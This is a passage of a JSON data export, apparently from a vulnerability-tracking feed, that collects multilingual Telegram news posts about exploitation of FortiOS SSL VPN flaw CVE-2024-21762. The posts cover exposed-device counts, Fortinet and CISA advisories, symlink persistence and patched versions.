Shadowserver.\n\n\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0448\u043b\u044e\u0437\u043e\u0432 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u0421\u0428\u0410 \u2014 24 \u0442\u044b\u0441\u044f\u0447\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432. \u0414\u0430\u043b\u0435\u0435 \u0432 \u043f\u043e\u0440\u044f\u0434\u043a\u0435 \u0443\u0431\u044b\u0432\u0430\u043d\u0438\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0442 \u0418\u043d\u0434\u0438\u044f, \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u044f \u0438 \u041a\u0430\u043d\u0430\u0434\u0430.\n\n\u0421\u0430\u043c\u0430 CVE-2024-21762 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CISA. \u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a \u043d\u0435\u0439 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u043c\u0435\u0441\u044f\u0446\u0435\u043c \u0440\u0430\u043d\u0435\u0435.\n\n\u0427\u0442\u043e\u0431\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c CVE-2024-21762, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. \u0412\u043f\u0440\u043e\u0447\u0435\u043c, \u043a\u0442\u043e \u0438 \u043a\u0430\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u0435\u0442\u0441\u044f. \n\n\ud83d\udd18 https://t.me/web_security_live", "creation_timestamp": "2024-03-12T08:55:02.000000Z"}, {"uuid": "ad292105-6609-42a8-8a35-4cf659d4874f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/KomunitiSiber/1466", "content": "Fortinet Warns of Critical FortiOS SSL VPN Vulnerability Under Active Exploitation\nhttps://thehackernews.com/2024/02/fortinet-warns-of-critical-fortios-ssl.html\n\nFortinet has disclosed a new critical security flaw in FortiOS SSL VPN that it said is likely being exploited in the wild.\nThe vulnerability,\u00a0CVE-2024-21762\u00a0(CVSS score: 9.6), allows for the execution of arbitrary code and commands.\n\"A out-of-bounds write vulnerability [CWE-787] in FortiOS may allow a remote unauthenticated attacker to execute arbitrary code or command via specially", "creation_timestamp": "2024-02-09T06:59:47.000000Z"}, {"uuid": "b9b7fe1b-35f2-4291-9128-290d02fbcfc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "Telegram/7oahUfPdKfKdKUrDh3F8hlo2b76U_3EO-JxcEUcrAU3ACaE", "content": "", "creation_timestamp": "2024-02-09T14:06:05.000000Z"}, {"uuid": "384d7a33-6b83-4e11-83f1-95c7fe544446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/2pc9aqbdDeOWvM9xQK1R1sLm1VX73tFUxrZoBlo0jn04A6Q", "content": "", "creation_timestamp": "2024-04-30T14:07:55.000000Z"}, {"uuid": "91f9122f-c8b4-4e50-89fc-39abcaf30770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/breachdetector/493278", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2024-21762 Nedir ? FortiOS G\u00fcvenlik A\u00e7\u0131\u011f\u0131\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"11 Apr 2024\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2024-04-11T15:43:55.000000Z"}, {"uuid": "99c1441c-0721-4a4c-8d26-418c93c19fda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/true_secator/6943", "content": "Fortinet \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0430\u0448\u043b\u0438 \u0441\u043f\u043e\u0441\u043e\u0431 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c FortiGate \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432, \u0431\u044b\u043b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d.\n\n\u041f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0438 \u0443\u0436\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f, \u043f\u043e\u043c\u0438\u043c\u043e \u043f\u0440\u043e\u0447\u0435\u0433\u043e, CVE-2022-4247, CVE-2023-27997 \u0438 CVE-2024-21762.\n\n\u042d\u0442\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u043f\u0443\u0442\u0435\u043c \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u0438, \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u044e\u0449\u0435\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043a\u043e\u0440\u043d\u0435\u0432\u0443\u044e \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0432 \u043f\u0430\u043f\u043a\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0434\u043b\u044f \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u044f\u0437\u044b\u043a\u043e\u0432\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f SSL-VPN.\n\nFortinet \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432\u043d\u043e\u0441\u0438\u043b\u0438\u0441\u044c \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0438\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0447\u0435\u0433\u043e \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0430 (\u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a \u0441\u0438\u043c\u043b\u0438\u043d\u043a) \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u043b\u0430\u0441\u044c \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0431\u044b\u043b\u0438 \u0437\u0430\u043a\u0440\u044b\u0442\u044b.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u044d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u043a \u0444\u0430\u0439\u043b\u0430\u043c \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0438 SSL-VPN, \u043d\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b \u044d\u0442\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439.\n\n\u041d\u0435\u044f\u0441\u043d\u043e, \u043a\u0442\u043e \u0441\u0442\u043e\u0438\u0442 \u0437\u0430 \u044d\u0442\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e, \u043d\u043e \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Fortinet \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e, \u0447\u0442\u043e \u043e\u043d\u0430 \u043d\u0435 \u0431\u044b\u043b\u0430 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0430 \u043a\u0430\u043a\u043e\u0439-\u043b\u0438\u0431\u043e \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u0439 \u0440\u0435\u0433\u0438\u043e\u043d \u0438\u043b\u0438 \u043e\u0442\u0440\u0430\u0441\u043b\u044c. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043a\u043e\u0441\u043d\u0443\u043b\u0430\u0441\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430.\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043c\u0435\u0440 \u043f\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u043f\u043e\u0432\u0442\u043e\u0440\u0435\u043d\u0438\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0431\u044b\u043b \u0432\u044b\u043f\u0443\u0449\u0435\u043d \u0440\u044f\u0434 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u041f\u041e FortiOS:\n\n- FortiOS 7.4, 7.2, 7.0 \u0438 6.4: \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0430 \u0431\u044b\u043b\u0430 \u043f\u043e\u043c\u0435\u0447\u0435\u043d\u0430 \u043a\u0430\u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f, \u043e\u043d\u0430 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0443\u0434\u0430\u043b\u044f\u0435\u0442\u0441\u044f \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u044f\u0434\u0440\u043e\u043c.\n\n- FortiOS 7.6.2, 7.4.7, 7.2.11, 7.0.17 \u0438 6.4.16: \u0441\u0438\u043c\u0432\u043e\u043b\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0430 \u0431\u044b\u043b\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u0430, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 SSL-VPN \u0431\u044b\u043b \u0438\u0437\u043c\u0435\u043d\u0435\u043d \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u0438\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0441\u0441\u044b\u043b\u043e\u043a.\n\n\u041a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b FortiOS \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 7.6.2, 7.4.7, 7.2.11, 7.0.17 \u0438\u043b\u0438 6.4.16, \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0438 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u0432\u0441\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043a\u0430\u043a \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044f\u00a0\u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0448\u0430\u0433\u0438 \u043f\u043e \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044e.\n\nCISA \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044e \u0441 \u043f\u0440\u0438\u0437\u044b\u0432\u043e\u043c \u0441\u0431\u0440\u043e\u0441\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 SSL-VPN \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0443\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u044b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f.\n\n\u0413\u0440\u0443\u043f\u043f\u0430 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f CERT-FR \u0432 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u043c \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435 \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0435\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f\u0445, \u0434\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u043d\u0430\u0447\u0430\u043b\u043e\u043c 2023 \u0433\u043e\u0434\u0430.\n\n\u0412 watchTowr \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0439\u0441\u0442\u0432\u043e \u043f\u043e \u0434\u0432\u0443\u043c \u0432\u0430\u0436\u043d\u044b\u043c \u043f\u0440\u0438\u0447\u0438\u043d\u0430\u043c.\n\n\u0412\u043e-\u043f\u0435\u0440\u0432\u044b\u0445, \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0431\u044b\u0441\u0442\u0440\u0435\u0435, \u0447\u0435\u043c \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0443\u0441\u043f\u0435\u0432\u0430\u044e\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0438 \u0447\u0442\u043e \u0435\u0449\u0435 \u0432\u0430\u0436\u043d\u0435\u0435, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0433\u043b\u0443\u0431\u043e\u043a\u043e \u043e\u0441\u043e\u0437\u043d\u0430\u044e\u0442 \u044d\u0442\u043e\u0442 \u0444\u0430\u043a\u0442.\n\n\u0412\u043e-\u0432\u0442\u043e\u0440\u044b\u0445, \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438, \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043b\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u043f\u043e\u0441\u043b\u0435 \u0431\u044b\u0441\u0442\u0440\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u0435\u0440\u0435\u0436\u0438\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u0441\u0431\u0440\u043e\u0441\u0430 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043a \u0437\u0430\u0432\u043e\u0434\u0441\u043a\u0438\u043c, \u0447\u0442\u043e\u0431\u044b \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u0435\u0442\u044f\u043c.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u043e\u0439 \u0431\u0430\u0437\u0435 watchTowr \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0441\u043b\u0443\u0447\u0430\u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0432 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043d\u043e\u0433\u0438\u0435 \u0431\u044b \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439.", "creation_timestamp": "2025-04-14T15:41:38.000000Z"}, {"uuid": "0a1d5c0a-9c7c-4572-aa21-091056ba2bbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/breachdetector/438616", "content": "{\n  \"Source\": \"https://exploit.in/\",\n  \"Content\": \"\u0425\u0430\u043a\u0435\u0440\u044b \u0448\u0442\u0443\u0440\u043c\u0443\u044e\u0442 FortiOS: RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-21762 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445\", \n  \"author\": \"News Support\",\n  \"Detection Date\": \"09 Feb 2024\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2024-02-09T16:41:06.000000Z"}, {"uuid": "ac33997b-09f8-4370-a6ac-40af7ae59a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "Telegram/lMPS4xg-qTPyYq5zUOIK_y4ifjB77qP0_d-8aiisgoTV9Fk", "content": "", "creation_timestamp": "2024-04-16T10:30:53.000000Z"}, {"uuid": "93663aa0-ecae-4981-b877-7242ee7e3fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/CyberSecurityIL/38653", "content": "\u05de\u05e2\u05e8\u05da \u05d4\u05e1\u05d9\u05d9\u05d1\u05e8 \u05de\u05e4\u05e8\u05e1\u05dd \u05d4\u05d5\u05d3\u05e2\u05d4 \u05dc\u05e4\u05d9\u05d4 \u05db--30 \u05d0\u05dc\u05e3 \u05db\u05ea\u05d5\u05d1\u05d5\u05ea, \u05d4\u05de\u05e9\u05d5\u05d9\u05db\u05d5\u05ea \u05dc\u05d0\u05dc\u05e4\u05d9 \u05d0\u05e8\u05d2\u05d5\u05e0\u05d9\u05dd \u05d1\u05d9\u05e9\u05e8\u05d0\u05dc, \u05d7\u05e9\u05d5\u05e4\u05d5\u05ea \u05dc\u05de\u05ea\u05e7\u05e4\u05ea \u05e1\u05d9\u05d9\u05d1\u05e8 \u05de\u05d9\u05d9\u05d3\u05d9\u05ea \u05d1\u05e9\u05dc \u05e9\u05ea\u05d9 \u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05e7\u05e8\u05d9\u05d8\u05d9\u05d5\u05ea \u05e9\u05d4\u05ea\u05d2\u05dc\u05d5 \u05d1\u05de\u05e2\u05e8\u05db\u05ea \u05d7\u05d9\u05d1\u05d5\u05e8 \u05de\u05e8\u05d7\u05d5\u05e7 (VPN) \u05de\u05ea\u05d5\u05e6\u05e8\u05ea \u05e4\u05d5\u05e8\u05d8\u05d9\u05e0\u05d8.\n\n\u05de\u05d3\u05d5\u05d1\u05e8 \u05d1\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05e9\u05e4\u05d5\u05e8\u05e1\u05de\u05d5 \u05d1-9.2.24:\n\nCVE-2024-23113\nCVE-2024-21762\n\n\u05d0\u05dc \u05ea\u05d7\u05db\u05d5 \u05e2\u05dd \u05d6\u05d4, \u05ea\u05e2\u05d3\u05db\u05e0\u05d5 \u05e2\u05db\u05e9\u05d9\u05d5. \u23f1\n\n\u05e8\u05d0\u05d9\u05ea\u05dd \u05de\u05d4 \u05e7\u05e8\u05d4 \u05dc\u05dc\u05d5\u05e7\u05d1\u05d9\u05d8 \u05e9\u05dc\u05d0 \u05e2\u05d9\u05d3\u05db\u05e0\u05d5 \u05d0\u05ea \u05d2\u05e8\u05e1\u05ea \u05d4-PHP \u05e9\u05dc\u05d4\u05dd \ud83d\ude09\n\nhttps://t.me/CyberSecurityIL/4681\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea #\u05d9\u05e9\u05e8\u05d0\u05dc", "creation_timestamp": "2024-02-22T11:12:47.000000Z"}, {"uuid": "77282199-f243-40c8-85d5-a4edf6f506d7", 